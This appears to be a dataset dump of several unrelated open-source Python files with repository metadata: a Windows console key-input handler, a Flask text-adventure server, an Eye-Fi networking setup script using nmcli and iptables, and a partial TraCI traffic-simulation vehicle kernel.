b'\x04': Keys.ControlD, # Control-D (exit)
b'\x05': Keys.ControlE, # Control-E (end)
b'\x06': Keys.ControlF, # Control-F (cursor forward)
b'\x07': Keys.ControlG, # Control-G
b'\x08': Keys.ControlH, # Control-H (8) (Identical to '\b')
b'\x09': Keys.ControlI, # Control-I (9) (Identical to '\t')
b'\x0a': Keys.ControlJ, # Control-J (10) (Identical to '\n')
b'\x0b': Keys.ControlK, # Control-K (delete until end of line; vertical tab)
b'\x0c': Keys.ControlL, # Control-L (clear; form feed)
b'\x0d': Keys.ControlM, # Control-M (enter)
b'\x0e': Keys.ControlN, # Control-N (14) (history forward)
b'\x0f': Keys.ControlO, # Control-O (15)
b'\x10': Keys.ControlP, # Control-P (16) (history back)
b'\x11': Keys.ControlQ, # Control-Q
b'\x12': Keys.ControlR, # Control-R (18) (reverse search)
b'\x13': Keys.ControlS, # Control-S (19) (forward search)
b'\x14': Keys.ControlT, # Control-T
b'\x15': Keys.ControlU, # Control-U
b'\x16': Keys.ControlV, # Control-V
b'\x17': Keys.ControlW, # Control-W
b'\x18': Keys.ControlX, # Control-X
b'\x19': Keys.ControlY, # Control-Y (25)
b'\x1a': Keys.ControlZ, # Control-Z
b'\x1c': Keys.ControlBackslash, # Both Control-\ and Ctrl-|
b'\x1d': Keys.ControlSquareClose, # Control-]
b'\x1e': Keys.ControlCircumflex, # Control-^
b'\x1f': Keys.ControlUnderscore, # Control-underscore (Also for Ctrl-hyphen.)
b'\x7f': Keys.Backspace, # (127) Backspace (ASCII Delete.)
}
# Keys that don't carry character data.
keycodes = {
# Home/End
33: Keys.PageUp,
34: Keys.PageDown,
35: Keys.End,
36: Keys.Home,
# Arrows
37: Keys.Left,
38: Keys.Up,
39: Keys.Right,
40: Keys.Down,
45: Keys.Insert,
46: Keys.Delete,
# F-keys.
112: Keys.F1,
113: Keys.F2,
114: Keys.F3,
115: Keys.F4,
116: Keys.F5,
117: Keys.F6,
118: Keys.F7,
119: Keys.F8,
120: Keys.F9,
121: Keys.F10,
122: Keys.F11,
123: Keys.F12,
}
LEFT_ALT_PRESSED = 0x0002
RIGHT_ALT_PRESSED = 0x0001
SHIFT_PRESSED = 0x0010
LEFT_CTRL_PRESSED = 0x0008
RIGHT_CTRL_PRESSED = 0x0004
def __init__(self, recognize_paste=True):
self._fdcon = None
self.recognize_paste = recognize_paste
# When stdin is a tty, use that handle, otherwise, create a handle from
# CONIN$.
if sys.stdin.isatty():
self.handle = windll.kernel32.GetStdHandle(STD_INPUT_HANDLE)
else:
self._fdcon = os.open('CONIN$', os.O_RDWR | os.O_BINARY)
self.handle = msvcrt.get_osfhandle(self._fdcon)
def close(self):
" Close fdcon. "
if self._fdcon is not None:
os.close(self._fdcon)
def read(self):
"""
Return a list of `KeyPress` instances. It won't return anything when
there was nothing to read. (This function doesn't block.)
http://msdn.microsoft.com/en-us/library/windows/desktop/ms684961(v=vs.85).aspx
"""
max_count = 2048 # Max events to read at the same time.
read = DWORD(0)
arrtype = INPUT_RECORD * max_count
input_records = arrtype()
# Check whether there is some input to read. `ReadConsoleInputW` would
# block otherwise.
# (Actually, the event loop is responsible to make sure that this
# function is only called when there is something to read, but for some
# reason this happened in the asyncio_win32 loop, and it's better to be
# safe anyway.)
if not wait_for_handles([self.handle], timeout=0):
return
# Get next batch of input event.
windll.kernel32.ReadConsoleInputW(
self.handle, pointer(input_records), max_count, pointer(read))
# First, get all the keys from the input buffer, in order to determine
# whether we should consider this a paste event or not.
all_keys = list(self._get_keys(read, input_records))
# Fill in 'data' for key presses.
all_keys = [self._insert_key_data(key) for key in all_keys]
if self.recognize_paste and self._is_paste(all_keys):
gen = iter(all_keys)
for k in gen:
# Pasting: if the current key consists of text or \n, turn it
# into a BracketedPaste.
data = []
while k and (isinstance(k.key, six.text_type) or
k.key == Keys.ControlJ):
data.append(k.data)
try:
k = next(gen)
except StopIteration:
k = None
if data:
yield KeyPress(Keys.BracketedPaste, ''.join(data))
if k is not None:
yield k
else:
for k in all_keys:
yield k
def _insert_key_data(self, key_press):
"""
Insert KeyPress data, for vt100 compatibility.
"""
if key_press.data:
return key_press
data = REVERSE_ANSI_SEQUENCES.get(key_press.key, '')
return KeyPress(key_press.key, data)
def _get_keys(self, read, input_records):
"""
Generator that yields `KeyPress` objects from the input records.
"""
for i in range(read.value):
ir = input_records[i]
# Get the right EventType from the EVENT_RECORD.
# (For some reason the Windows console application 'cmder'
# [http://gooseberrycreative.com/cmder/] can return '0' for
# ir.EventType. -- Just ignore that.)
if ir.EventType in EventTypes:
ev = getattr(ir.Event, EventTypes[ir.EventType])
# Process if this is a key event. (We also have mouse, menu and
# focus events.)
if type(ev) == KEY_EVENT_RECORD and ev.KeyDown:
for key_press in self._event_to_key_presses(ev):
yield key_press
elif type(ev) == MOUSE_EVENT_RECORD:
for key_press in self._handle_mouse(ev):
yield key_press
@staticmethod
def _is_paste(keys):
"""
Return `True` when we should consider this list of keys as a paste
event. Pasted text on windows will be turned into a
`Keys.BracketedPaste` event. (It's not 100% correct, but it is probably
the best possible way to detect pasting of text and handle that
correctly.)
"""
# Consider paste when it contains at least one newline and at least one
# other character.
text_count = 0
newline_count = 0
for k in keys:
if isinstance(k.key, six.text_type):
text_count += 1
if k.key == Keys.ControlM:
newline_count += 1
return newline_count >= 1 and text_count > 1
def _event_to_key_presses(self, ev):
"""
For this `KEY_EVENT_RECORD`, return a list of `KeyPress` instances.
"""
assert type(ev) == KEY_EVENT_RECORD and ev.KeyDown
result = None
u_char = ev.uChar.UnicodeChar
ascii_char = u_char.encode('utf-8')
# NOTE: We don't use `ev.uChar.AsciiChar`. That appears to be latin-1
# encoded. See also:
# https://github.com/ipython/ipython/issues/10004
# https://github.com/jonathanslenders/python-prompt-toolkit/issues/389
if u_char == '\x00':
if ev.VirtualKeyCode in self.keycodes:
result = KeyPress(self.keycodes[ev.VirtualKeyCode], '')
else:
if ascii_char in self.mappings:
if self.mappings[ascii_char] == Keys.ControlJ:
u_char = '\n' # Windows sends \n, turn into \r for unix compatibility.
result = KeyPress(self.mappings[ascii_char], u_char)
else:
result = KeyPress(u_char, u_char)
# Correctly handle Control-Arrow keys.
if (ev.ControlKeyState & self.LEFT_CTRL_PRESSED or
ev.ControlKeyState & self.RIGHT_CTRL_PRESSED) and result:
if result.key == Keys.Left:
result.key = Keys.ControlLeft
if result.key == Keys.Right:
result.key = Keys.ControlRight
if result.key == Keys.Up:
result.key = Keys.ControlUp
if result.key == Keys.Down:
result.key = Keys.ControlDown
# Turn 'Tab' into 'BackTab' when shift was pressed.
if ev.ControlKeyState & self.SHIFT_PRESSED and result:
if result.key == Keys.Tab:
result.key = Keys.BackTab
# Turn 'Space' into 'ControlSpace' when control was pressed.
if (ev.ControlKeyState & self.LEFT_CTRL_PRESSED or
ev.ControlKeyState & self.RIGHT_CTRL_PRESSED) and result and result.data == ' ':
result = KeyPress(Keys.ControlSpace, ' ')
# Turn Control-Enter into META-Enter. (On a vt100 terminal, we cannot
# detect this combination. But it's really practical on Windows.)
if (ev.ControlKeyState & self.LEFT_CTRL_PRESSED or
ev.ControlKeyState & self.RIGHT_CTRL_PRESSED) and result and \
result.key == Keys.ControlJ:
return [KeyPress(Keys.Escape, ''), result]
# Return result. If alt was pressed, prefix the result with an
# 'Escape' key, just like unix VT100 terminals do.
# NOTE: Only replace the left alt with escape. The right alt key often
# acts as altgr and is used in many non US keyboard layouts for
# typing some special characters, like a backslash. We don't want
# all backslashes to be prefixed with escape. (Esc-\ has a
# meaning in E-macs, for instance.)
if result:
meta_pressed = ev.ControlKeyState & self.LEFT_ALT_PRESSED
if meta_pressed:
return [KeyPress(Keys.Escape, ''), result]
else:
return [result]
else:
return []
def _handle_mouse(self, ev):
"""
Handle mouse events. Return a list of KeyPress instances.
"""
FROM_LEFT_1ST_BUTTON_PRESSED = 0x1
result = []
# Check event type.
if ev.ButtonState == FROM_LEFT_1ST_BUTTON_PRESSED:
# On a key press, generate both the mouse down and up event.
for event_type in [MouseEventType.MOUSE_DOWN, MouseEventType.MOUSE_UP]:
data = ';'.join([
event_type,
str(ev.MousePosition.X),
str(ev.MousePosition.Y)
])
result.append(KeyPress(Keys.WindowsMouseEvent, data))
return result
_current_callbacks = {} # loop -> callback
@contextmanager
def attach_win32_input(input, callback):
"""
Context manager that makes this input active in the current event loop.
:param input: :class:`~prompt_toolkit.input.Input` object.
:param input_ready_callback: Called when the input is ready to read.
"""
assert isinstance(input, Input)
assert callable(callback)
loop = get_event_loop()
previous_callback = _current_callbacks.get(loop)
# Add reader.
loop.add_win32_handle(input.handle, callback)
_current_callbacks[loop] = callback
try:
yield
finally:
loop.remove_win32_handle(input.handle)
if previous_callback:
loop.add_win32_handle(input.handle, previous_callback)
_current_callbacks[loop] = previous_callback
else:
del _current_callbacks[loop]
@contextmanager
def detach_win32_input(input):
assert isinstance(input, Input)
loop = get_event_loop()
previous = _current_callbacks.get(loop)
if previous:
loop.remove_win32_handle(input.handle)
_current_callbacks[loop] = None
try:
yield
finally:
if previous:
loop.add_win32_handle(input.handle, previous)
_current_callbacks[loop] = previous
class raw_mode(object):
"""
::
with raw_mode(stdin):
''' the windows terminal is now in 'raw' mode. '''
The ``fileno`` attribute is ignored. This is to be compatible with the
`raw_input` method of `.vt100_input`.
"""
def __init__(self, fileno=None):
self.handle = windll.kernel32.GetStdHandle(STD_INPUT_HANDLE)
def __enter__(self):
# Remember original mode.
original_mode = DWORD()
windll.kernel32.GetConsoleMode(self.handle, pointer(original_mode))
self.original_mode = original_mode
self._patch()
def _patch(self):
# Set raw
ENABLE_ECHO_INPUT = 0x0004
ENABLE_LINE_INPUT = 0x0002
ENABLE_PROCESSED_INPUT = 0x0001
windll.kernel32.SetConsoleMode(
self.handle, self.original_mode.value &
~(ENABLE_ECHO_INPUT | ENABLE_LINE_INPUT | ENABLE_PROCESSED_INPUT))
def __exit__(self, *a, **kw):
# Restore original mode
windll.kernel32.SetConsoleMode(self.handle, self.original_mode)
class cooked_mode(raw_mode):
"""
::
with cooked_mode(stdin):
''' The pseudo-terminal stdin is now used in cooked mode. '''
"""
def _patch(self):
# Set cooked.
ENABLE_ECHO_INPUT = 0x0004
ENABLE_LINE_INPUT = 0x0002
ENABLE_PROCESSED_INPUT = 0x0001
windll.kernel32.SetConsoleMode(
self.handle, self.original_mode.value |
(ENABLE_ECHO_INPUT | ENABLE_LINE_INPUT | ENABLE_PROCESSED_INPUT))
| mit | -7,604,924,395,875,958,000 | 32.658 | 119 | 0.583457 | false | 3.801446 | false | false | false |
becdot/adventures-in-text | game_site.py | 1 | 2155 | # FLASK WEBSITE
# Runs the game online (currently only on localhost: 5000)
# Renders html, passes user_action to game.play(action), and calls database methods to get, save, and delete games
from game import Game
from db_methods import SECRET_KEY, DATABASE, COLLECTION, DEBUG, app, g, \
connect_db, init_db, save_game, get_game, new_game
from flask import Flask, render_template, request, session, redirect, url_for
@app.before_request
def before_request():
g.connection = connect_db()
g.db = g.connection[DATABASE][COLLECTION]
@app.teardown_request
def teardown_request(exception):
g.connection.close()
def get_new_game(user_id=None):
blank_game = Game()
if user_id:
print "deleting user", user_id
session['id'] = new_game(blank_game, user_id)
print "creating a new game for user", session['id']
return redirect(url_for('index'))
@app.route('/', methods=['GET', 'POST'])
def index():
if request.method == 'GET':
if 'id' in session and get_game(session['id']):
loaded_game = get_game(session['id'])
print "session", session['id'], "is already initialized"
return render_template('form.html', room=loaded_game.game['location'],
inventory=loaded_game.game['inv'], exits=loaded_game.game['location'].exits)
else:
if 'id' in session:
return get_new_game(session['id'])
return get_new_game()
elif request.method == 'POST':
action = request.form['action']
if 'id' not in session:
return redirect(url_for('index'))
loaded = get_game(session['id'])
msg = loaded.play(action)
save_game(session['id'], loaded)
print "saving game for user", session['id']
return render_template('form.html', room=loaded.game['location'], inventory=loaded.game['inv'], \
exits=loaded.game['location'].exits, message=msg)
@app.route('/newgame', methods=['GET'])
def newgame():
return get_new_game(session['id'])
if __name__ == '__main__':
app.run(host='localhost') | mit | -2,956,342,439,897,804,300 | 36.172414 | 114 | 0.612065 | false | 3.728374 | false | false | false |
hgdeoro/EFLU | eyefilinuxui/networking_setup.py | 1 | 3424 | # coding=utf-8
#----------------------------------------------------------------------
# Copyright (c) 2013 Horacio G. de Oro <[email protected]>
#----------------------------------------------------------------------
# This file is part of EFLU.
#
# EFLU is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# EFLU is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EFLU. If not, see <http://www.gnu.org/licenses/>.
#----------------------------------------------------------------------
import logging
import subprocess
from eyefilinuxui.util import kdesudo
logger = logging.getLogger(__name__)
def nm_interface_exists(interface):
"""Returns True if interface exists"""
# $ nmcli -t -f DEVICE dev
# wlan0
# eth0
output = subprocess.check_output(["nmcli", "-t", "-f", "DEVICE", "dev"])
logger.debug("OUTPUT: %s", output)
return interface in [l.strip() for l in output.strip().splitlines() if l.strip()]
def nm_check_disconnected(interface):
"""Returns True if interface is disconnected"""
# $ nmcli -t -f DEVICE,STATE dev
# wlan0:disconnected
# eth0:connected
output = subprocess.check_output(["nmcli", "-t", "-f", "DEVICE,STATE", "dev"])
for line in [l.strip() for l in output.strip().splitlines() if l.strip()]:
dev, state = line.split(':')
if dev == interface:
if state == 'disconnected':
logger.info("GOOD! Device %s is disconnected.", interface)
return True
else:
logger.warn("Device %s isn't disconnected - Device state: %s", interface, state)
return False
logger.warn("nmcli doesn't returned info for interface %s", interface)
return False
def nm_try_disconnect(interface):
return subprocess.call(["nmcli", "dev", "disconnect", "iface", interface])
def ifconfig(interface, ip):
return kdesudo(["ifconfig", interface, "{0}/24".format(ip)])
def iptables(interface, ip):
# FIXME: put comments and check it to not repeat the setup of firewall every time the app starts
iptables_rules = subprocess.check_output(["kdesudo", "--", "iptables", "-n", "-v", "-L", "INPUT"])
logger.debug("iptables_rules: %s", iptables_rules)
if iptables_rules.find("/* EyeFiServerUi/1 */") == -1:
kdesudo(["iptables", "-I", "INPUT", "-i", interface,
"-p", "icmp", "-d", ip, "-m", "comment", "--comment", "EyeFiServerUi/1", "-j", "ACCEPT"])
if iptables_rules.find("/* EyeFiServerUi/2 */") == -1:
kdesudo(["iptables", "-I", "INPUT", "-i", interface,
"-p", "tcp", "-d", ip, "-m", "comment", "--comment", "EyeFiServerUi/2",
"--dport", "59278", "-j", "ACCEPT"])
if iptables_rules.find("/* EyeFiServerUi/3 */") == -1:
kdesudo(["iptables", "-I", "INPUT", "-i", interface,
"-p", "udp", "-d", ip, "-m", "comment", "--comment", "EyeFiServerUi/3",
"--dport", "67:68", "-j", "ACCEPT"])
| gpl-3.0 | -7,873,829,662,059,535,000 | 41.271605 | 102 | 0.575643 | false | 3.733915 | false | false | false |
cathywu/flow | flow/core/kernel/vehicle/traci.py | 1 | 40571 | """Script containing the TraCI vehicle kernel class."""
import traceback
from flow.core.kernel.vehicle import KernelVehicle
import traci.constants as tc
from traci.exceptions import FatalTraCIError, TraCIException
import numpy as np
import collections
import warnings
from flow.controllers.car_following_models import SimCarFollowingController
from flow.controllers.rlcontroller import RLController
from flow.controllers.lane_change_controllers import SimLaneChangeController
from bisect import bisect_left
import itertools
from copy import deepcopy
# colors for vehicles
WHITE = (255, 255, 255)
CYAN = (0, 255, 255)
RED = (255, 0, 0)
class TraCIVehicle(KernelVehicle):
"""Flow kernel for the TraCI API.
Extends flow.core.kernel.vehicle.base.KernelVehicle
"""
def __init__(self,
master_kernel,
sim_params):
"""See parent class."""
KernelVehicle.__init__(self, master_kernel, sim_params)
self.__ids = [] # ids of all vehicles
self.__human_ids = [] # ids of human-driven vehicles
self.__controlled_ids = [] # ids of flow-controlled vehicles
self.__controlled_lc_ids = [] # ids of flow lc-controlled vehicles
self.__rl_ids = [] # ids of rl-controlled vehicles
self.__observed_ids = [] # ids of the observed vehicles
# vehicles: Key = Vehicle ID, Value = Dictionary describing the vehicle
# Ordered dictionary used to keep neural net inputs in order
self.__vehicles = collections.OrderedDict()
# create a sumo_observations variable that will carry all information
# on the state of the vehicles for a given time step
self.__sumo_obs = {}
# total number of vehicles in the network
self.num_vehicles = 0
# number of rl vehicles in the network
self.num_rl_vehicles = 0
# contains the parameters associated with each type of vehicle
self.type_parameters = {}
# contain the minGap attribute of each type of vehicle
self.minGap = {}
# list of vehicle ids located in each edge in the network
self._ids_by_edge = dict()
# number of vehicles that entered the network for every time-step
self._num_departed = []
self._departed_ids = []
# number of vehicles to exit the network for every time-step
self._num_arrived = []
self._arrived_ids = []
# whether or not to automatically color vehicles
try:
self._color_vehicles = sim_params.color_vehicles
except AttributeError:
self._color_vehicles = False
def initialize(self, vehicles):
"""Initialize vehicle state information.
This is responsible for collecting vehicle type information from the
VehicleParams object and placing them within the Vehicles kernel.
Parameters
----------
vehicles : flow.core.params.VehicleParams
initial vehicle parameter information, including the types of
individual vehicles and their initial speeds
"""
self.type_parameters = vehicles.type_parameters
self.minGap = vehicles.minGap
self.num_vehicles = 0
self.num_rl_vehicles = 0
self.__vehicles.clear()
for typ in vehicles.initial:
for i in range(typ['num_vehicles']):
veh_id = '{}_{}'.format(typ['veh_id'], i)
self.__vehicles[veh_id] = dict()
self.__vehicles[veh_id]['type'] = typ['veh_id']
self.__vehicles[veh_id]['initial_speed'] = typ['initial_speed']
self.num_vehicles += 1
if typ['acceleration_controller'][0] == RLController:
self.num_rl_vehicles += 1
def update(self, reset):
"""See parent class.
The following actions are performed:
* The state of all vehicles is modified to match their state at the
current time step. This includes states specified by sumo, and states
explicitly defined by flow, e.g. "num_arrived".
* If vehicles exit the network, they are removed from the vehicles
class, and newly departed vehicles are introduced to the class.
Parameters
----------
reset : bool
specifies whether the simulator was reset in the last simulation
step
"""
vehicle_obs = {}
for veh_id in self.__ids:
vehicle_obs[veh_id] = \
self.kernel_api.vehicle.getSubscriptionResults(veh_id)
sim_obs = self.kernel_api.simulation.getSubscriptionResults()
# remove exiting vehicles from the vehicles class
for veh_id in sim_obs[tc.VAR_ARRIVED_VEHICLES_IDS]:
if veh_id not in sim_obs[tc.VAR_TELEPORT_STARTING_VEHICLES_IDS]:
self.remove(veh_id)
# remove exiting vehicles from the vehicle subscription if they
# haven't been removed already
if vehicle_obs[veh_id] is None:
vehicle_obs.pop(veh_id, None)
else:
# this is meant to resolve the KeyError bug when there are
# collisions
vehicle_obs[veh_id] = self.__sumo_obs[veh_id]
# add entering vehicles into the vehicles class
for veh_id in sim_obs[tc.VAR_DEPARTED_VEHICLES_IDS]:
veh_type = self.kernel_api.vehicle.getTypeID(veh_id)
if veh_id in self.get_ids():
# this occurs when a vehicle is actively being removed and
# placed again in the network to ensure a constant number of
# total vehicles (e.g. GreenWaveEnv). In this case, the vehicle
# is already in the class; its state data just needs to be
# updated
pass
else:
obs = self._add_departed(veh_id, veh_type)
# add the subscription information of the new vehicle
vehicle_obs[veh_id] = obs
if reset:
self.time_counter = 0
# reset all necessary values
self.prev_last_lc = dict()
for veh_id in self.__rl_ids:
self.__vehicles[veh_id]["last_lc"] = -float("inf")
self.prev_last_lc[veh_id] = -float("inf")
self._num_departed.clear()
self._num_arrived.clear()
self._departed_ids.clear()
self._arrived_ids.clear()
# add vehicles from a network template, if applicable
if hasattr(self.master_kernel.scenario.network,
"template_vehicles"):
for veh_id in self.master_kernel.scenario.network.\
template_vehicles:
vals = deepcopy(self.master_kernel.scenario.network.
template_vehicles[veh_id])
# a step is executed during initialization, so add this sim
# step to the departure time of vehicles
vals['depart'] = str(
float(vals['depart']) + 2 * self.sim_step)
self.kernel_api.vehicle.addFull(
veh_id, 'route{}_0'.format(veh_id), **vals)
else:
self.time_counter += 1
# update the "last_lc" variable
for veh_id in self.__rl_ids:
prev_lane = self.get_lane(veh_id)
if vehicle_obs[veh_id][tc.VAR_LANE_INDEX] != prev_lane:
self.__vehicles[veh_id]["last_lc"] = self.time_counter
# updated the list of departed and arrived vehicles
self._num_departed.append(
len(sim_obs[tc.VAR_DEPARTED_VEHICLES_IDS]))
self._num_arrived.append(len(sim_obs[tc.VAR_ARRIVED_VEHICLES_IDS]))
self._departed_ids.append(sim_obs[tc.VAR_ARRIVED_VEHICLES_IDS])
self._arrived_ids.append(sim_obs[tc.VAR_ARRIVED_VEHICLES_IDS])
# update the "headway", "leader", and "follower" variables
for veh_id in self.__ids:
try:
_position = vehicle_obs.get(veh_id, {}).get(
tc.VAR_POSITION, -1001)
_angle = vehicle_obs.get(veh_id, {}).get(tc.VAR_ANGLE, -1001)
_time_step = sim_obs[tc.VAR_TIME_STEP]
_time_delta = sim_obs[tc.VAR_DELTA_T]
self.__vehicles[veh_id]["orientation"] = \
list(_position) + [_angle]
self.__vehicles[veh_id]["timestep"] = _time_step
self.__vehicles[veh_id]["timedelta"] = _time_delta
except TypeError:
print(traceback.format_exc())
headway = vehicle_obs.get(veh_id, {}).get(tc.VAR_LEADER, None)
# check for a collided vehicle or a vehicle with no leader
if headway is None:
self.__vehicles[veh_id]["leader"] = None
self.__vehicles[veh_id]["follower"] = None
self.__vehicles[veh_id]["headway"] = 1e+3
else:
min_gap = self.minGap[self.get_type(veh_id)]
self.__vehicles[veh_id]["headway"] = headway[1] + min_gap
self.__vehicles[veh_id]["leader"] = headway[0]
try:
self.__vehicles[headway[0]]["follower"] = veh_id
except KeyError:
print(traceback.format_exc())
# update the sumo observations variable
self.__sumo_obs = vehicle_obs.copy()
# update the lane leaders data for each vehicle
self._multi_lane_headways()
# make sure the rl vehicle list is still sorted
self.__rl_ids.sort()
def _add_departed(self, veh_id, veh_type):
"""Add a vehicle that entered the network from an inflow or reset.
Parameters
----------
veh_id: str
name of the vehicle
veh_type: str
type of vehicle, as specified to sumo
Returns
-------
dict
subscription results from the new vehicle
"""
if veh_type not in self.type_parameters:
raise KeyError("Entering vehicle is not a valid type.")
self.__ids.append(veh_id)
if veh_id not in self.__vehicles:
self.num_vehicles += 1
self.__vehicles[veh_id] = dict()
# specify the type
self.__vehicles[veh_id]["type"] = veh_type
car_following_params = \
self.type_parameters[veh_type]["car_following_params"]
# specify the acceleration controller class
accel_controller = \
self.type_parameters[veh_type]["acceleration_controller"]
self.__vehicles[veh_id]["acc_controller"] = \
accel_controller[0](veh_id,
car_following_params=car_following_params,
**accel_controller[1])
# specify the lane-changing controller class
lc_controller = \
self.type_parameters[veh_type]["lane_change_controller"]
self.__vehicles[veh_id]["lane_changer"] = \
lc_controller[0](veh_id=veh_id, **lc_controller[1])
# specify the routing controller class
rt_controller = self.type_parameters[veh_type]["routing_controller"]
if rt_controller is not None:
self.__vehicles[veh_id]["router"] = \
rt_controller[0](veh_id=veh_id, router_params=rt_controller[1])
else:
self.__vehicles[veh_id]["router"] = None
# add the vehicle's id to the list of vehicle ids
if accel_controller[0] == RLController:
self.__rl_ids.append(veh_id)
self.num_rl_vehicles += 1
else:
self.__human_ids.append(veh_id)
if accel_controller[0] != SimCarFollowingController:
self.__controlled_ids.append(veh_id)
if lc_controller[0] != SimLaneChangeController:
self.__controlled_lc_ids.append(veh_id)
# subscribe the new vehicle
self.kernel_api.vehicle.subscribe(veh_id, [
tc.VAR_LANE_INDEX, tc.VAR_LANEPOSITION, tc.VAR_ROAD_ID,
tc.VAR_SPEED, tc.VAR_EDGES, tc.VAR_POSITION, tc.VAR_ANGLE,
tc.VAR_SPEED_WITHOUT_TRACI
])
self.kernel_api.vehicle.subscribeLeader(veh_id, 2000)
# some constant vehicle parameters to the vehicles class
self.__vehicles[veh_id]["length"] = self.kernel_api.vehicle.getLength(
veh_id)
# set the "last_lc" parameter of the vehicle
self.__vehicles[veh_id]["last_lc"] = -float("inf")
# specify the initial speed
self.__vehicles[veh_id]["initial_speed"] = \
self.type_parameters[veh_type]["initial_speed"]
# set the speed mode for the vehicle
speed_mode = self.type_parameters[veh_type][
"car_following_params"].speed_mode
self.kernel_api.vehicle.setSpeedMode(veh_id, speed_mode)
# set the lane changing mode for the vehicle
lc_mode = self.type_parameters[veh_type][
"lane_change_params"].lane_change_mode
self.kernel_api.vehicle.setLaneChangeMode(veh_id, lc_mode)
# get initial state info
self.__sumo_obs[veh_id] = dict()
self.__sumo_obs[veh_id][tc.VAR_ROAD_ID] = \
self.kernel_api.vehicle.getRoadID(veh_id)
self.__sumo_obs[veh_id][tc.VAR_LANEPOSITION] = \
self.kernel_api.vehicle.getLanePosition(veh_id)
self.__sumo_obs[veh_id][tc.VAR_LANE_INDEX] = \
self.kernel_api.vehicle.getLaneIndex(veh_id)
self.__sumo_obs[veh_id][tc.VAR_SPEED] = \
self.kernel_api.vehicle.getSpeed(veh_id)
# make sure that the order of rl_ids is kept sorted
self.__rl_ids.sort()
# get the subscription results from the new vehicle
new_obs = self.kernel_api.vehicle.getSubscriptionResults(veh_id)
return new_obs
def remove(self, veh_id):
"""See parent class."""
# remove from sumo
if veh_id in self.kernel_api.vehicle.getIDList():
self.kernel_api.vehicle.unsubscribe(veh_id)
self.kernel_api.vehicle.remove(veh_id)
try:
# remove from the vehicles kernel
del self.__vehicles[veh_id]
del self.__sumo_obs[veh_id]
self.__ids.remove(veh_id)
# remove it from all other ids (if it is there)
if veh_id in self.__human_ids:
self.__human_ids.remove(veh_id)
if veh_id in self.__controlled_ids:
self.__controlled_ids.remove(veh_id)
if veh_id in self.__controlled_lc_ids:
self.__controlled_lc_ids.remove(veh_id)
else:
self.__rl_ids.remove(veh_id)
# make sure that the rl ids remain sorted
self.__rl_ids.sort()
except KeyError:
pass
# modify the number of vehicles and RL vehicles
self.num_vehicles = len(self.get_ids())
self.num_rl_vehicles = len(self.get_rl_ids())
def test_set_speed(self, veh_id, speed):
"""Set the speed of the specified vehicle."""
self.__sumo_obs[veh_id][tc.VAR_SPEED] = speed
def test_set_edge(self, veh_id, edge):
"""Set the speed of the specified vehicle."""
self.__sumo_obs[veh_id][tc.VAR_ROAD_ID] = edge
def set_follower(self, veh_id, follower):
"""Set the follower of the specified vehicle."""
self.__vehicles[veh_id]["follower"] = follower
def set_headway(self, veh_id, headway):
"""Set the headway of the specified vehicle."""
self.__vehicles[veh_id]["headway"] = headway
def get_orientation(self, veh_id):
"""See parent class."""
return self.__vehicles[veh_id]["orientation"]
def get_timestep(self, veh_id):
"""See parent class."""
return self.__vehicles[veh_id]["timestep"]
def get_timedelta(self, veh_id):
"""See parent class."""
return self.__vehicles[veh_id]["timedelta"]
def get_type(self, veh_id):
"""Return the type of the vehicle of veh_id."""
return self.__vehicles[veh_id]["type"]
def get_initial_speed(self, veh_id):
"""Return the initial speed of the vehicle of veh_id."""
return self.__vehicles[veh_id]["initial_speed"]
def get_ids(self):
"""See parent class."""
return self.__ids
def get_human_ids(self):
"""See parent class."""
return self.__human_ids
def get_controlled_ids(self):
"""See parent class."""
return self.__controlled_ids
def get_controlled_lc_ids(self):
"""See parent class."""
return self.__controlled_lc_ids
def get_rl_ids(self):
"""See parent class."""
return self.__rl_ids
def set_observed(self, veh_id):
"""See parent class."""
if veh_id not in self.__observed_ids:
self.__observed_ids.append(veh_id)
def remove_observed(self, veh_id):
"""See parent class."""
if veh_id in self.__observed_ids:
self.__observed_ids.remove(veh_id)
def get_observed_ids(self):
"""See parent class."""
return self.__observed_ids
def get_ids_by_edge(self, edges):
"""See parent class."""
if isinstance(edges, (list, np.ndarray)):
return sum([self.get_ids_by_edge(edge) for edge in edges], [])
return self._ids_by_edge.get(edges, []) or []
def get_inflow_rate(self, time_span):
"""See parent class."""
if len(self._num_departed) == 0:
return 0
num_inflow = self._num_departed[-int(time_span / self.sim_step):]
return 3600 * sum(num_inflow) / (len(num_inflow) * self.sim_step)
def get_outflow_rate(self, time_span):
"""See parent class."""
if len(self._num_arrived) == 0:
return 0
num_outflow = self._num_arrived[-int(time_span / self.sim_step):]
return 3600 * sum(num_outflow) / (len(num_outflow) * self.sim_step)
def get_num_arrived(self):
"""See parent class."""
if len(self._num_arrived) > 0:
return self._num_arrived[-1]
else:
return 0
def get_arrived_ids(self):
"""See parent class."""
if len(self._arrived_ids) > 0:
return self._arrived_ids[-1]
else:
return 0
def get_departed_ids(self):
"""See parent class."""
if len(self._departed_ids) > 0:
return self._departed_ids[-1]
else:
return 0
def get_speed(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_speed(vehID, error) for vehID in veh_id]
return self.__sumo_obs.get(veh_id, {}).get(tc.VAR_SPEED, error)
def get_default_speed(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_default_speed(vehID, error) for vehID in veh_id]
return self.__sumo_obs.get(veh_id, {}).get(tc.VAR_SPEED_WITHOUT_TRACI,
error)
def get_position(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_position(vehID, error) for vehID in veh_id]
return self.__sumo_obs.get(veh_id, {}).get(tc.VAR_LANEPOSITION, error)
def get_edge(self, veh_id, error=""):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_edge(vehID, error) for vehID in veh_id]
return self.__sumo_obs.get(veh_id, {}).get(tc.VAR_ROAD_ID, error)
def get_lane(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_lane(vehID, error) for vehID in veh_id]
return self.__sumo_obs.get(veh_id, {}).get(tc.VAR_LANE_INDEX, error)
def get_route(self, veh_id, error=list()):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
